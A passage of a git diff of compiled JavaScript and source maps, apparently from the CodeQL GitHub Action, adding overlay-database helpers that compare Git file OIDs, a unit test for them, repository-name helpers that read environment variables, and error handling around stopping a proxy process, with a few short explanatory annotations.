J,CAAC;QACH,CAAC;IACH,CAAC;AACH,CAAC"}
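Annotation: getOverlayDatabaseMode above is driven entirely by CODEQL_OVERLAY_DATABASE_MODE, with three guards that each degrade to "none" with a warning. A condensed decision sketch of the same order, with boolean stand-ins for the three checks:

    // Condensed view of getOverlayDatabaseMode's decision order:
    //   1. env var must request "overlay" or "overlay-base";
    //   2. build-mode must be "none";
    //   3. CLI must be >= CODEQL_OVERLAY_MINIMUM_VERSION ("2.20.5");
    //   4. the source root must sit inside a git repository.
    type OverlayMode = "overlay" | "overlay-base" | "none";
    function decideOverlayMode(
      requested: string | undefined,
      buildModeIsNone: boolean,
      cliAtLeastMinimum: boolean,
      insideGitRepo: boolean,
    ): OverlayMode {
      if (requested !== "overlay" && requested !== "overlay-base") return "none";
      if (!buildModeIsNone || !cliAtLeastMinimum || !insideGitRepo) return "none";
      return requested;
    }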
129 lib/overlay-database-utils.js generated Normal file
@@ -0,0 +1,129 @@
|
|||||||
|
"use strict";
|
||||||
|
var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {
|
||||||
|
if (k2 === undefined) k2 = k;
|
||||||
|
var desc = Object.getOwnPropertyDescriptor(m, k);
|
||||||
|
if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {
|
||||||
|
desc = { enumerable: true, get: function() { return m[k]; } };
|
||||||
|
}
|
||||||
|
Object.defineProperty(o, k2, desc);
|
||||||
|
}) : (function(o, m, k, k2) {
|
||||||
|
if (k2 === undefined) k2 = k;
|
||||||
|
o[k2] = m[k];
|
||||||
|
}));
|
||||||
|
var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {
|
||||||
|
Object.defineProperty(o, "default", { enumerable: true, value: v });
|
||||||
|
}) : function(o, v) {
|
||||||
|
o["default"] = v;
|
||||||
|
});
|
||||||
|
var __importStar = (this && this.__importStar) || (function () {
|
||||||
|
var ownKeys = function(o) {
|
||||||
|
ownKeys = Object.getOwnPropertyNames || function (o) {
|
||||||
|
var ar = [];
|
||||||
|
for (var k in o) if (Object.prototype.hasOwnProperty.call(o, k)) ar[ar.length] = k;
|
||||||
|
return ar;
|
||||||
|
};
|
||||||
|
return ownKeys(o);
|
||||||
|
};
|
||||||
|
return function (mod) {
|
||||||
|
        if (mod && mod.__esModule) return mod;
        var result = {};
        if (mod != null) for (var k = ownKeys(mod), i = 0; i < k.length; i++) if (k[i] !== "default") __createBinding(result, mod, k[i]);
        __setModuleDefault(result, mod);
        return result;
    };
})();
Object.defineProperty(exports, "__esModule", { value: true });
exports.CODEQL_OVERLAY_MINIMUM_VERSION = exports.OverlayDatabaseMode = void 0;
exports.writeBaseDatabaseOidsFile = writeBaseDatabaseOidsFile;
exports.writeOverlayChangesFile = writeOverlayChangesFile;
const fs = __importStar(require("fs"));
const path = __importStar(require("path"));
const actions_util_1 = require("./actions-util");
const git_utils_1 = require("./git-utils");
var OverlayDatabaseMode;
(function (OverlayDatabaseMode) {
    OverlayDatabaseMode["Overlay"] = "overlay";
    OverlayDatabaseMode["OverlayBase"] = "overlay-base";
    OverlayDatabaseMode["None"] = "none";
})(OverlayDatabaseMode || (exports.OverlayDatabaseMode = OverlayDatabaseMode = {}));
exports.CODEQL_OVERLAY_MINIMUM_VERSION = "2.20.5";
/**
 * Writes a JSON file containing Git OIDs for all tracked files (represented
 * by path relative to the source root) under the source root. The file is
 * written into the database location specified in the config.
 *
 * @param config The configuration object containing the database location
 * @param sourceRoot The root directory containing the source files to process
 * @throws {Error} If the Git repository root cannot be determined
 */
async function writeBaseDatabaseOidsFile(config, sourceRoot) {
    const gitFileOids = await (0, git_utils_1.getFileOidsUnderPath)(sourceRoot);
    const gitFileOidsJson = JSON.stringify(gitFileOids);
    const baseDatabaseOidsFilePath = getBaseDatabaseOidsFilePath(config);
    await fs.promises.writeFile(baseDatabaseOidsFilePath, gitFileOidsJson);
}
/**
 * Reads and parses the JSON file containing the base database Git OIDs.
 * This file contains the mapping of file paths to their corresponding Git OIDs
 * that was previously written by writeBaseDatabaseOidsFile().
 *
 * @param config The configuration object containing the database location
 * @param logger The logger instance to use for error reporting
 * @returns An object mapping file paths (relative to source root) to their Git OIDs
 * @throws {Error} If the file cannot be read or parsed
 */
async function readBaseDatabaseOidsFile(config, logger) {
    const baseDatabaseOidsFilePath = getBaseDatabaseOidsFilePath(config);
    try {
        const contents = await fs.promises.readFile(baseDatabaseOidsFilePath, "utf-8");
        return JSON.parse(contents);
    }
    catch (e) {
        logger.error("Failed to read overlay-base file OIDs from " +
            `${baseDatabaseOidsFilePath}: ${e.message || e}`);
        throw e;
    }
}
function getBaseDatabaseOidsFilePath(config) {
    return path.join(config.dbLocation, "base-database-oids.json");
}
/**
 * Writes a JSON file containing the source-root-relative paths of files under
 * `sourceRoot` that have changed (added, removed, or modified) from the overlay
 * base database.
 *
 * This function uses the Git index to determine which files have changed, so it
 * requires the following preconditions, both when this function is called and
 * when the overlay-base database was initialized:
 *
 * - It requires that `sourceRoot` is inside a Git repository.
 * - It assumes that all changes in the working tree are staged in the index.
 * - It assumes that all files of interest are tracked by Git, e.g. not covered
 *   by `.gitignore`.
 */
async function writeOverlayChangesFile(config, sourceRoot, logger) {
    const baseFileOids = await readBaseDatabaseOidsFile(config, logger);
    const overlayFileOids = await (0, git_utils_1.getFileOidsUnderPath)(sourceRoot);
    const changedFiles = computeChangedFiles(baseFileOids, overlayFileOids);
    logger.info(`Found ${changedFiles.length} changed file(s) under ${sourceRoot}.`);
    const changedFilesJson = JSON.stringify({ changes: changedFiles });
    const overlayChangesFile = path.join((0, actions_util_1.getTemporaryDirectory)(), "overlay-changes.json");
    logger.debug(`Writing overlay changed files to ${overlayChangesFile}: ${changedFilesJson}`);
    await fs.promises.writeFile(overlayChangesFile, changedFilesJson);
    return overlayChangesFile;
}
function computeChangedFiles(baseFileOids, overlayFileOids) {
    const changes = [];
    for (const [file, oid] of Object.entries(overlayFileOids)) {
        if (!(file in baseFileOids) || baseFileOids[file] !== oid) {
            changes.push(file);
        }
    }
    for (const file of Object.keys(baseFileOids)) {
        if (!(file in overlayFileOids)) {
            changes.push(file);
        }
    }
    return changes;
}
//# sourceMappingURL=overlay-database-utils.js.map
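Taken together, the two loops in computeChangedFiles perform a plain set comparison over two path-to-OID maps: anything new or changed in the overlay, plus anything missing from it. A minimal standalone sketch of that comparison, with invented OIDs:

// Standalone sketch of the comparison in computeChangedFiles (OIDs invented).
const base = { "unchanged.js": "aaa111", "modified.js": "bbb222", "deleted.js": "ccc333" };
const overlay = { "unchanged.js": "aaa111", "modified.js": "ddd444", "added.js": "eee555" };

const changes = [];
// Added or modified: present in the overlay under a new or different OID.
for (const [file, oid] of Object.entries(overlay)) {
    if (!(file in base) || base[file] !== oid) changes.push(file);
}
// Deleted: present in the base but absent from the overlay.
for (const file of Object.keys(base)) {
    if (!(file in overlay)) changes.push(file);
}
console.log(changes); // [ 'modified.js', 'added.js', 'deleted.js' ]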
lib/overlay-database-utils.js.map (new file, 1 line)
@@ -0,0 +1 @@
{"version":3,"file":"overlay-database-utils.js","sourceRoot":"","sources":["../src/overlay-database-utils.ts"],"names":[],"mappings":"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"}
lib/overlay-database-utils.test.js (generated, new file, 94 lines)
@@ -0,0 +1,94 @@
"use strict";
|
||||||
|
var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {
|
||||||
|
if (k2 === undefined) k2 = k;
|
||||||
|
var desc = Object.getOwnPropertyDescriptor(m, k);
|
||||||
|
if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {
|
||||||
|
desc = { enumerable: true, get: function() { return m[k]; } };
|
||||||
|
}
|
||||||
|
Object.defineProperty(o, k2, desc);
|
||||||
|
}) : (function(o, m, k, k2) {
|
||||||
|
if (k2 === undefined) k2 = k;
|
||||||
|
o[k2] = m[k];
|
||||||
|
}));
|
||||||
|
var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {
|
||||||
|
Object.defineProperty(o, "default", { enumerable: true, value: v });
|
||||||
|
}) : function(o, v) {
|
||||||
|
o["default"] = v;
|
||||||
|
});
|
||||||
|
var __importStar = (this && this.__importStar) || (function () {
|
||||||
|
var ownKeys = function(o) {
|
||||||
|
ownKeys = Object.getOwnPropertyNames || function (o) {
|
||||||
|
var ar = [];
|
||||||
|
for (var k in o) if (Object.prototype.hasOwnProperty.call(o, k)) ar[ar.length] = k;
|
||||||
|
return ar;
|
||||||
|
};
|
||||||
|
return ownKeys(o);
|
||||||
|
};
|
||||||
|
return function (mod) {
|
||||||
|
if (mod && mod.__esModule) return mod;
|
||||||
|
var result = {};
|
||||||
|
if (mod != null) for (var k = ownKeys(mod), i = 0; i < k.length; i++) if (k[i] !== "default") __createBinding(result, mod, k[i]);
|
||||||
|
__setModuleDefault(result, mod);
|
||||||
|
return result;
|
||||||
|
};
|
||||||
|
})();
|
||||||
|
var __importDefault = (this && this.__importDefault) || function (mod) {
|
||||||
|
return (mod && mod.__esModule) ? mod : { "default": mod };
|
||||||
|
};
|
||||||
|
Object.defineProperty(exports, "__esModule", { value: true });
|
||||||
|
const fs = __importStar(require("fs"));
|
||||||
|
const path = __importStar(require("path"));
|
||||||
|
const ava_1 = __importDefault(require("ava"));
|
||||||
|
const sinon = __importStar(require("sinon"));
|
||||||
|
const actionsUtil = __importStar(require("./actions-util"));
|
||||||
|
const gitUtils = __importStar(require("./git-utils"));
|
||||||
|
const logging_1 = require("./logging");
|
||||||
|
const overlay_database_utils_1 = require("./overlay-database-utils");
|
||||||
|
const testing_utils_1 = require("./testing-utils");
|
||||||
|
const util_1 = require("./util");
|
||||||
|
(0, testing_utils_1.setupTests)(ava_1.default);
|
||||||
|
(0, ava_1.default)("writeOverlayChangesFile generates correct changes file", async (t) => {
|
||||||
|
await (0, util_1.withTmpDir)(async (tmpDir) => {
|
||||||
|
const dbLocation = path.join(tmpDir, "db");
|
||||||
|
await fs.promises.mkdir(dbLocation, { recursive: true });
|
||||||
|
const sourceRoot = path.join(tmpDir, "src");
|
||||||
|
await fs.promises.mkdir(sourceRoot, { recursive: true });
|
||||||
|
const tempDir = path.join(tmpDir, "temp");
|
||||||
|
await fs.promises.mkdir(tempDir, { recursive: true });
|
||||||
|
const logger = (0, logging_1.getRunnerLogger)(true);
|
||||||
|
const config = (0, testing_utils_1.createTestConfig)({ dbLocation });
|
||||||
|
// Mock the getFileOidsUnderPath function to return base OIDs
|
||||||
|
const baseOids = {
|
||||||
|
"unchanged.js": "aaa111",
|
||||||
|
"modified.js": "bbb222",
|
||||||
|
"deleted.js": "ccc333",
|
||||||
|
};
|
||||||
|
const getFileOidsStubForBase = sinon
|
||||||
|
.stub(gitUtils, "getFileOidsUnderPath")
|
||||||
|
.resolves(baseOids);
|
||||||
|
// Write the base database OIDs file
|
||||||
|
await (0, overlay_database_utils_1.writeBaseDatabaseOidsFile)(config, sourceRoot);
|
||||||
|
getFileOidsStubForBase.restore();
|
||||||
|
// Mock the getFileOidsUnderPath function to return overlay OIDs
|
||||||
|
const currentOids = {
|
||||||
|
"unchanged.js": "aaa111",
|
||||||
|
"modified.js": "ddd444", // Changed OID
|
||||||
|
"added.js": "eee555", // New file
|
||||||
|
};
|
||||||
|
const getFileOidsStubForOverlay = sinon
|
||||||
|
.stub(gitUtils, "getFileOidsUnderPath")
|
||||||
|
.resolves(currentOids);
|
||||||
|
// Write the overlay changes file, which uses the mocked overlay OIDs
|
||||||
|
// and the base database OIDs file
|
||||||
|
const getTempDirStub = sinon
|
||||||
|
.stub(actionsUtil, "getTemporaryDirectory")
|
||||||
|
.returns(tempDir);
|
||||||
|
const changesFilePath = await (0, overlay_database_utils_1.writeOverlayChangesFile)(config, sourceRoot, logger);
|
||||||
|
getFileOidsStubForOverlay.restore();
|
||||||
|
getTempDirStub.restore();
|
||||||
|
const fileContent = await fs.promises.readFile(changesFilePath, "utf-8");
|
||||||
|
const parsedContent = JSON.parse(fileContent);
|
||||||
|
t.deepEqual(parsedContent.changes.sort(), ["added.js", "deleted.js", "modified.js"], "Should identify added, deleted, and modified files");
|
||||||
|
});
|
||||||
|
});
|
||||||
|
//# sourceMappingURL=overlay-database-utils.test.js.map
|
||||||
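The test above swaps out gitUtils.getFileOidsUnderPath twice, restoring the real implementation between the base and overlay phases so the two calls observe different OIDs. The underlying sinon stub-then-restore pattern in isolation (module and values invented):

// Isolated sketch of sinon's stub-then-restore pattern used in the test above.
const sinon = require("sinon");
const mathUtils = { roll: () => Math.random() }; // invented stand-in module

const stub = sinon.stub(mathUtils, "roll").returns(0.5);
console.log(mathUtils.roll()); // 0.5: the stubbed value
stub.restore(); // reinstate the original implementation
console.log(typeof mathUtils.roll()); // "number": original behavior again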
lib/overlay-database-utils.test.js.map (new file, 1 line)
@@ -0,0 +1 @@
{"version":3,"file":"overlay-database-utils.test.js","sourceRoot":"","sources":["../src/overlay-database-utils.test.ts"],"names":[],"mappings":";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;AAAA,uCAAyB;AACzB,2CAA6B;AAE7B,8CAAuB;AACvB,6CAA+B;AAE/B,4DAA8C;AAC9C,sDAAwC;AACxC,uCAA4C;AAC5C,qEAGkC;AAClC,mDAA+D;AAC/D,iCAAoC;AAEpC,IAAA,0BAAU,EAAC,aAAI,CAAC,CAAC;AAEjB,IAAA,aAAI,EAAC,wDAAwD,EAAE,KAAK,EAAE,CAAC,EAAE,EAAE;IACzE,MAAM,IAAA,iBAAU,EAAC,KAAK,EAAE,MAAM,EAAE,EAAE;QAChC,MAAM,UAAU,GAAG,IAAI,CAAC,IAAI,CAAC,MAAM,EAAE,IAAI,CAAC,CAAC;QAC3C,MAAM,EAAE,CAAC,QAAQ,CAAC,KAAK,CAAC,UAAU,EAAE,EAAE,SAAS,EAAE,IAAI,EAAE,CAAC,CAAC;QACzD,MAAM,UAAU,GAAG,IAAI,CAAC,IAAI,CAAC,MAAM,EAAE,KAAK,CAAC,CAAC;QAC5C,MAAM,EAAE,CAAC,QAAQ,CAAC,KAAK,CAAC,UAAU,EAAE,EAAE,SAAS,EAAE,IAAI,EAAE,CAAC,CAAC;QACzD,MAAM,OAAO,GAAG,IAAI,CAAC,IAAI,CAAC,MAAM,EAAE,MAAM,CAAC,CAAC;QAC1C,MAAM,EAAE,CAAC,QAAQ,CAAC,KAAK,CAAC,OAAO,EAAE,EAAE,SAAS,EAAE,IAAI,EAAE,CAAC,CAAC;QAEtD,MAAM,MAAM,GAAG,IAAA,yBAAe,EAAC,IAAI,CAAC,CAAC;QACrC,MAAM,MAAM,GAAG,IAAA,gCAAgB,EAAC,EAAE,UAAU,EAAE,CAAC,CAAC;QAEhD,6DAA6D;QAC7D,MAAM,QAAQ,GAAG;YACf,cAAc,EAAE,QAAQ;YACxB,aAAa,EAAE,QAAQ;YACvB,YAAY,EAAE,QAAQ;SACvB,CAAC;QACF,MAAM,sBAAsB,GAAG,KAAK;aACjC,IAAI,CAAC,QAAQ,EAAE,sBAAsB,CAAC;aACtC,QAAQ,CAAC,QAAQ,CAAC,CAAC;QAEtB,oCAAoC;QACpC,MAAM,IAAA,kDAAyB,EAAC,MAAM,EAAE,UAAU,CAAC,CAAC;QACpD,sBAAsB,CAAC,OAAO,EAAE,CAAC;QAEjC,gEAAgE;QAChE,MAAM,WAAW,GAAG;YAClB,cAAc,EAAE,QAAQ;YACxB,aAAa,EAAE,QAAQ,EAAE,cAAc;YACvC,UAAU,EAAE,QAAQ,EAAE,WAAW;SAClC,CAAC;QACF,MAAM,yBAAyB,GAAG,KAAK;aACpC,IAAI,CAAC,QAAQ,EAAE,sBAAsB,CAAC;aACtC,QAAQ,CAAC,WAAW,CAAC,CAAC;QAEzB,qEAAqE;QACrE,kCAAkC;QAClC,MAAM,cAAc,GAAG,KAAK;aACzB,IAAI,CAAC,WAAW,EAAE,uBAAuB,CAAC;aAC1C,OAAO,CAAC,OAAO,CAAC,CAAC;QACpB,MAAM,eAAe,GAAG,MAAM,IAAA,gDAAuB,EACnD,MAAM,EACN,UAAU,EACV,MAAM,CACP,CAAC;QACF,yBAAyB,CAAC,OAAO,EAAE,CAAC;QACpC,cAAc,CAAC,OAAO,EAAE,CAAC;QAEzB,MAAM,WAAW,GAAG,MAAM,EAAE,CAAC,QAAQ,CAAC,QAAQ,CAAC,eAAe,EAAE,OAAO,CAAC,CAAC;QACzE,MAAM,aAAa,GAAG,IAAI,CAAC,KAAK,CAAC,WAAW,CAA0B,CAAC;QAEvE,CAAC,CAAC,SAAS,CACT,aAAa,CAAC,OAAO,CAAC,IAAI,EAAE,EAC5B,CAAC,UAAU,EAAE,YAAY,EAAE,aAAa,CAAC,EACzC,oDAAoD,CACrD,CAAC;IACJ,CAAC,CAAC,CAAC;AACL,CAAC,CAAC,CAAC"}
lib/repository.js (generated, 26 lines changed)
@@ -1,7 +1,33 @@
"use strict";
|
"use strict";
|
||||||
Object.defineProperty(exports, "__esModule", { value: true });
|
Object.defineProperty(exports, "__esModule", { value: true });
|
||||||
|
exports.getRepositoryNwo = getRepositoryNwo;
|
||||||
|
exports.getRepositoryNwoFromEnv = getRepositoryNwoFromEnv;
|
||||||
exports.parseRepositoryNwo = parseRepositoryNwo;
|
exports.parseRepositoryNwo = parseRepositoryNwo;
|
||||||
const util_1 = require("./util");
|
const util_1 = require("./util");
|
||||||
|
/**
|
||||||
|
* Get the repository name with owner from the environment variable
|
||||||
|
* `GITHUB_REPOSITORY`.
|
||||||
|
*
|
||||||
|
* @returns The repository name with owner.
|
||||||
|
*/
|
||||||
|
function getRepositoryNwo() {
|
||||||
|
return getRepositoryNwoFromEnv("GITHUB_REPOSITORY");
|
||||||
|
}
|
||||||
|
/**
|
||||||
|
* Get the repository name with owner from the first environment variable that
|
||||||
|
* is set and non-empty.
|
||||||
|
*
|
||||||
|
* @param envVarNames The names of the environment variables to check.
|
||||||
|
* @returns The repository name with owner.
|
||||||
|
* @throws ConfigurationError if none of the environment variables are set.
|
||||||
|
*/
|
||||||
|
function getRepositoryNwoFromEnv(...envVarNames) {
|
||||||
|
const envVarName = envVarNames.find((name) => process.env[name]);
|
||||||
|
if (!envVarName) {
|
||||||
|
throw new util_1.ConfigurationError(`None of the env vars ${envVarNames.join(", ")} are set`);
|
||||||
|
}
|
||||||
|
return parseRepositoryNwo((0, util_1.getRequiredEnvParam)(envVarName));
|
||||||
|
}
|
||||||
function parseRepositoryNwo(input) {
|
function parseRepositoryNwo(input) {
|
||||||
const parts = input.split("/");
|
const parts = input.split("/");
|
||||||
if (parts.length !== 2) {
|
if (parts.length !== 2) {
|
||||||
|
|||||||
lib/repository.js.map (generated)
@@ -1 +1 @@
{"version":3,"file":"repository.js","sourceRoot":"","sources":["../src/repository.ts"],"names":[],"mappings":";;AAQA,gDASC;AAjBD,iCAA4C;AAQ5C,SAAgB,kBAAkB,CAAC,KAAa;IAC9C,MAAM,KAAK,GAAG,KAAK,CAAC,KAAK,CAAC,GAAG,CAAC,CAAC;IAC/B,IAAI,KAAK,CAAC,MAAM,KAAK,CAAC,EAAE,CAAC;QACvB,MAAM,IAAI,yBAAkB,CAAC,IAAI,KAAK,kCAAkC,CAAC,CAAC;IAC5E,CAAC;IACD,OAAO;QACL,KAAK,EAAE,KAAK,CAAC,CAAC,CAAC;QACf,IAAI,EAAE,KAAK,CAAC,CAAC,CAAC;KACf,CAAC;AACJ,CAAC"}
{"version":3,"file":"repository.js","sourceRoot":"","sources":["../src/repository.ts"],"names":[],"mappings":";;AAcA,4CAEC;AAUD,0DAUC;AAED,gDASC;AA/CD,iCAAiE;AAQjE;;;;;GAKG;AACH,SAAgB,gBAAgB;IAC9B,OAAO,uBAAuB,CAAC,mBAAmB,CAAC,CAAC;AACtD,CAAC;AAED;;;;;;;GAOG;AACH,SAAgB,uBAAuB,CACrC,GAAG,WAAqB;IAExB,MAAM,UAAU,GAAG,WAAW,CAAC,IAAI,CAAC,CAAC,IAAI,EAAE,EAAE,CAAC,OAAO,CAAC,GAAG,CAAC,IAAI,CAAC,CAAC,CAAC;IACjE,IAAI,CAAC,UAAU,EAAE,CAAC;QAChB,MAAM,IAAI,yBAAkB,CAC1B,wBAAwB,WAAW,CAAC,IAAI,CAAC,IAAI,CAAC,UAAU,CACzD,CAAC;IACJ,CAAC;IACD,OAAO,kBAAkB,CAAC,IAAA,0BAAmB,EAAC,UAAU,CAAC,CAAC,CAAC;AAC7D,CAAC;AAED,SAAgB,kBAAkB,CAAC,KAAa;IAC9C,MAAM,KAAK,GAAG,KAAK,CAAC,KAAK,CAAC,GAAG,CAAC,CAAC;IAC/B,IAAI,KAAK,CAAC,MAAM,KAAK,CAAC,EAAE,CAAC;QACvB,MAAM,IAAI,yBAAkB,CAAC,IAAI,KAAK,kCAAkC,CAAC,CAAC;IAC5E,CAAC;IACD,OAAO;QACL,KAAK,EAAE,KAAK,CAAC,CAAC,CAAC;QACf,IAAI,EAAE,KAAK,CAAC,CAAC,CAAC;KACf,CAAC;AACJ,CAAC"}
lib/start-proxy-action-post.js (generated, 7 lines changed)
@@ -53,7 +53,12 @@ async function runWrapper() {
     // Kill the running proxy
     const pid = core.getState("proxy-process-pid");
     if (pid) {
-        process.kill(Number(pid));
+        try {
+            process.kill(Number(pid));
+        }
+        catch (error) {
+            logger.error(`Failed to kill proxy process: ${(0, util_1.getErrorMessage)(error)}`);
+        }
     }
     const config = await configUtils.getConfig(actionsUtil.getTemporaryDirectory(), logger);
     if ((config && config.debugMode) || core.isDebug()) {

lib/start-proxy-action-post.js.map (generated)
@@ -1 +1 @@
{"version":3,"file":"start-proxy-action-post.js","sourceRoot":"","sources":["../src/start-proxy-action-post.ts"],"names":[],"mappings":";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;AAAA;;;;GAIG;AACH,oDAAsC;AAEtC,4DAA8C;AAC9C,6CAAgD;AAChD,4DAA8C;AAC9C,uDAA8D;AAC9D,uCAA6C;AAC7C,iCAAoE;AAEpE,KAAK,UAAU,UAAU;IACvB,MAAM,MAAM,GAAG,IAAA,0BAAgB,GAAE,CAAC;IAElC,IAAI,CAAC;QACH,4CAA4C;QAC5C,WAAW,CAAC,aAAa,EAAE,CAAC;QAE5B,yBAAyB;QACzB,MAAM,GAAG,GAAG,IAAI,CAAC,QAAQ,CAAC,mBAAmB,CAAC,CAAC;QAC/C,IAAI,GAAG,EAAE,CAAC;YACR,OAAO,CAAC,IAAI,CAAC,MAAM,CAAC,GAAG,CAAC,CAAC,CAAC;QAC5B,CAAC;QAED,MAAM,MAAM,GAAG,MAAM,WAAW,CAAC,SAAS,CACxC,WAAW,CAAC,qBAAqB,EAAE,EACnC,MAAM,CACP,CAAC;QAEF,IAAI,CAAC,MAAM,IAAI,MAAM,CAAC,SAAS,CAAC,IAAI,IAAI,CAAC,OAAO,EAAE,EAAE,CAAC;YACnD,MAAM,WAAW,GAAG,IAAI,CAAC,QAAQ,CAAC,gBAAgB,CAAC,CAAC;YACpD,MAAM,CAAC,IAAI,CACT,wEAAwE,CACzE,CAAC;YACF,IAAI,MAAM,EAAE,aAAa,CAAC,IAAI,KAAK,SAAS,EAAE,CAAC;gBAC7C,MAAM,CAAC,OAAO,CACZ,qFAAqF,CACtF,CAAC;gBACF,OAAO;YACT,CAAC;YACD,MAAM,aAAa,GAAG,MAAM,IAAA,6BAAgB,GAAE,CAAC;YAC/C,IAAA,gCAAyB,EAAC,aAAa,EAAE,MAAM,CAAC,CAAC;YAEjD,MAAM,gBAAgB,GAAG,MAAM,IAAA,2CAAyB,EACtD,MAAM,EACN,aAAa,CAAC,IAAI,CACnB,CAAC;YAEF,MAAM,gBAAgB,CAAC,cAAc,CACnC,gBAAgB,EAChB,CAAC,WAAW,CAAC,EACb,WAAW,CAAC,qBAAqB,EAAE,EACnC;gBACE,wFAAwF;gBACxF,aAAa,EAAE,CAAC;aACjB,CACF,CAAC;QACJ,CAAC;IACH,CAAC;IAAC,OAAO,KAAK,EAAE,CAAC;QACf,gEAAgE;QAChE,MAAM,CAAC,OAAO,CACZ,wCAAwC,IAAA,sBAAe,EAAC,KAAK,CAAC,EAAE,CACjE,CAAC;IACJ,CAAC;AACH,CAAC;AAED,KAAK,UAAU,EAAE,CAAC"}
